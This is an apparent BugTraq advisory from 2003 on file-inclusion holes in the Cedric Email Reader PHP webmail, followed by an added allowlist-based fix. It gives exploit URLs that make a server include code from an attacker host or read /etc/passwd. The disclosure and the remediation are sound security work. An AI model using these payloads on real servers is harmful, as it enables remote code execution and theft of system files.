BugTraq
Cedric Email Reader (PHP)
Feb 09 2003 10:05AM
MGhz (magas mail lt)
Version : 0.2;0.3;0.4
Website : http://www.isoca.com/
Problems :Include file (local, remote)
Version: 0.2;0.3
File:
---------------------------------
email.php3 (version 0.2) ; email.php (version 0.3)
---------------------------------
PHP Code:
---------------------------------
[...]
require('emailreader.ini');
if ($login > "") {
parse_str($param);
include($cer_skin);
include('email.inc');
$mbox = openimap($server, $username, $password);
$text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));
[...]
---------------------------------
Exploit :
---------------------------------
http://[target]/email.php?login=attacker&cer_skin=http://[attacker]/code.php
-->
include http://[attacker]/code.php on remote server
---
include local file
-->
http://[target]/email.php?login=attacker&cer_skin=/etc/passwd
---------------------------------
Versions: 0.4
File:
---------------------------------
webmail/lib/emailreader_execute_on_each_page.inc.php
---------------------------------
PHP Code:
---------------------------------
[...]
$param = imap_base64($login);
parse_str($param);
@include($emailreader_ini);
@include('lib/'.$server_type.'.inc.php');
@include('skin/emailreaderskin_'.$lang.'.php');
[...]
---------------------------------
Exploit :
---------------------------------
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://[attacker]/code.php
-->
include http://[attacker]/code.php on remote server
---
include local file
-->
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=/etc/passwd
---------------------------------
--
(if register_globals=ON)
--
--
magas (at) mail (dot) lt [email concealed]
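
Added example, not part of the original post and not Cedric Email Reader code: one way to replace include($cer_skin) (and the similar includes built from $server_type and $lang) with a lookup against a fixed allowlist. The skin/ directory, the skin names and the resolve_include() helper are assumptions made for illustration.

```php
<?php
// Added example (not Cedric Email Reader code). Directory layout and the
// allowed names below are assumptions chosen for illustration.
const SKIN_DIR      = __DIR__ . '/skin';
const ALLOWED_SKINS = ['default', 'blue'];      // hypothetical skin names

/**
 * Resolve a request-supplied name to a .php file under $baseDir.
 * Returns the absolute path, or null if the name is not acceptable.
 */
function resolve_include(string $baseDir, $name, array $allowed): ?string
{
    // Fixed allowlist: URLs, absolute paths and "../" never match an entry.
    if (!is_string($name) || !in_array($name, $allowed, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return null;                             // directory or file missing
    }
    // realpath() follows symlinks, so confirm the target is still in $baseDir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed inputs: the two values from the advisory, a traversal string,
// and a legitimate name (accepted only if skin/default.php exists).
$samples = ['http://[attacker]/code.php', '/etc/passwd', '../emailreader.ini', 'default'];
foreach ($samples as $value) {
    $resolved = resolve_include(SKIN_DIR, $value, ALLOWED_SKINS);
    printf("%-28s => %s\n", $value, $resolved ?? 'rejected');
}

// In the application, read the parameter explicitly instead of relying on
// register_globals or parse_str() to create $cer_skin:
//   $skin = resolve_include(SKIN_DIR, $_GET['cer_skin'] ?? 'default', ALLOWED_SKINS);
//   if ($skin === null) { http_response_code(400); exit; }
//   include $skin;
```

Turning register_globals off removes the precondition the post names, and disabling allow_url_fopen (allow_url_include on PHP 5.2 and later) stops include from fetching http:// URLs. The allowlist is still needed for the local-file case.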